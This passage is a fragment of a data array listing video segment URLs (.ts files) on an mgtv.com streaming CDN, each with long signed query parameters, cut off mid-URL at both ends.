3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/0E9ED250AB8F1F1E7B9A5F5EA9D23501_790080_800080_980_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/7BB2F346228180CD56353B8F274A0C1C_800080_810080_1126_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/17E42B20AE545E75B5E0553
66F6C7603_810080_820080_660_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/D7A0363FF7BC329D0026EB121C0765DA_820080_830080_1112_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/283F635A138A17CAA26946C85C5A36C7_830080_840080_801_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113X
wH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/F827462B3F93B701723D1025AB7B0E92_840080_850080_2180_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/F5CA3FFC1062A95A4E843AF79F5396C1_850080_860080_1380_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/2C18A
768E47FCB41607A81B9DA904D53_860080_870080_677_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/0C21C6C4D1DBAC14671F68F54EFC1F94_870080_880080_773_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/906F8CBF3EA039D51E6AE6469E8B07EE_880080_890080_1610_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyV
MVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/69EFC4D9886B3216B0530E97D1A749A5_890080_900080_974_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/EA7C482D4B187F3D9964DF1EEFB60491_900080_910080_915_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_
1_1025_mp4/E4DCD677952DF775536BA7C62020F73D_910080_920080_622_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/F8B55361FE2232F4EA653D0FCAB3ADE4_920080_930080_474_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/5DF9857B322A337FE92B74E6F2176568_930080_940080_1386_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW
6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/A0A1EB30B632077EEE65A2129F2441B3_940080_950080_1247_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/D3AB5AF39C957AFF90C82AA9B6B90C27_950080_960080_889_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22
EFDA2_20210529_1_1_1025_mp4/202718C8199545118AB538F6391ACE6C_960080_970080_491_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/4D96BB73F2C33A3473C921F644083960_970080_980080_488_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/67ECFC2CBBC3D1D540569C8AC46F3DB0_980080_990080_1469_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOI
u~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/7C80C3D81FFC18CCFEE3927E476D906C_990080_1000080_2127_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv